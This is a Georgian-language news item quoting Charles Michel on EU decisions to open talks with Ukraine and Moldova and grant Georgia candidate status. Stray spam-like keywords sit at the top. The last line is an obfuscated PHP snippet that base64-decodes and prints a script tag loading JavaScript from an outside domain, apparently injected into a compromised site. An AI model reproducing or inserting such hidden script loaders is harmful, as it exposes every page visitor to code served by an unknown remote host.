celsiusi
ავერსი საქკაბელი

 ისტორიული მომენტია. ეს აჩვენებს ევროკავშირის სანდოობას, ევროკავშირის სიძლიერეს. გადაწყვეტილებები მიღებულია. ჩვენ გავხსენით მოლაპარაკებები უკრაინასა და მოლდოვასთან, მივეცით სტატუსი საქართველოს, – ამის შესახებ ევროპული საბჭოს პრეზიდენტმა, შარლ მიშელმა განაცხადა.

„ბოსნია-ჰერცეგოვინასთან დაკავშირებით გვსურს მოლაპარაკების დაწყება. ანგარიში გამოქვეყნდება მარტში და ამის საფუძველზე მივიღებთ გადაწყვეტილებას. ჩვენ გვურს, მხარი დავუჭიროთ უკრაინას. ეს არის ძლიერი პოლიტიკური სიგნალი, ძლიერი პოლიტიკური გადაწყვეტილება. დღეს ჩვენ ვფიქრობთ უკრაინელ ხალხზე და მათ გვერდით ვართ“, – აცხადებს მიშელი.

მიშელის თქმით, ევროკავშირის საბჭოს გადაწყვეტილება ძალიან მნიშვნელოვანია ევროკავშირის სანდოობისთვის.

„ბევრი ვიმუშავეთ სამიტის წინ. მნიშვნელოვანია, რომ არცერთი წევრი ქვეყანა არ შეეწინააღმდეგება გადაწყვეტილებას. რთული დებატები მიმდინარეობს, ჩარჩოზე უნდა შევთანხმდეთ. იმედი მაქვს, რომ მომდევნო საათებში შევძლებთ, ვიყოთ ერთიანები ამ საკთხთან დაკავშირებით“, – აღნიშნა შარლ მიშელმა.

264
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");